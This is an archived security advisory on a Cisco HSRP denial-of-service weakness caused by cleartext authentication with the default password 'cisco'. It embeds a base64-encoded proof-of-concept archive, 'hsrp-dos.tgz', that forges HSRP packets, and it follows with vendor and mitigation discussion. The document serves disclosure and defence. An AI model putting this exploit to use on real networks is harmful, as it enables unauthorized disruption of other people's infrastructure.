COMMAND

    Cisco

SYSTEMS AFFECTED

    Cisco HSRP

PROBLEM

    'bashis' found following.  He  was playing with Cisco's HSRP  (Hot
    Standby Routing Protocol), and there is a (major) weakness in that
    protocol that allow any host in a LAN segment to make a HSRP DoS.

    Short (very)  explain of  HSRP.   HSRP uses  UDP on  port 1985  to
    multicast address  224.0.0.2, and  the authentication  is in clear
    text.  (default: cisco)

    Included is  a small  program that  sends out  a fake HSRP packet,
    when it hear a legal HSRP packet, as a "proof of concept" code...

    ---
    Content-Type: application/octet-stream; name="hsrp-dos.tgz"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="hsrp-dos.tgz"
    Content-MD5: nKbYhzRWPSLBJSU+KUUegg==

    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

    -----

    - this vulnerability can be exploited only from the local  segment
      (not over the Internet),
    - the  same effect,  denial of  service, can  be produced by using
      ARP, which can not be protected in any way

    The last issue is especially important since it may cause a  false
    sense of security if user is using a hardened version the protocol
    (whichever protocol).   Even by using  VRRP and ESP+AH  option, an
    attacker can still disrupt the network by using ARP.

SOLUTION

    Vendor was notified about this  14 April 2001, and their  response
    was to use HSRP with IPSec.

    Their response was  precisely correct.   Given the evils  that can
    be done  with ARP-spoofing,  this sort  of misbehavior  by someone
    already on  the LAN  can't easily  be prevented.   More generally,
    have a look at RFC 2338, on VRRP -- the Virtual Router  Redundancy
    Protocol.  VRRP is the standards-track replacement for HSRP.   The
    Security Considerations section explains when to use each type  of
    authentication, up to and including IPsec.

    Cisco's real mistake is in having a common default  authentication
    word -- not  because it's a  security failure, but  because it can
    no longer fulfill its  function of guarding against  configuration
    errors.

    It's realy  old news,  this was  allready known  in '98  when they
    written  RFC  2281  but  nobody  have  talked  about it in public,
    except Cisco who is saying how good it is, to get a fault tolerant
    network..

    Cisco can confirm that  described vulnerability is present  in the
    HSRP and,  at the  present time,  there is  no workaround  for it.
    Cisco is deliberating  usage of IP  authenticated header for  HSRP
    and  VRRP  (Virtual  Router  Redundancy  Protocol, RFC2338) in the
    future releases of IOS.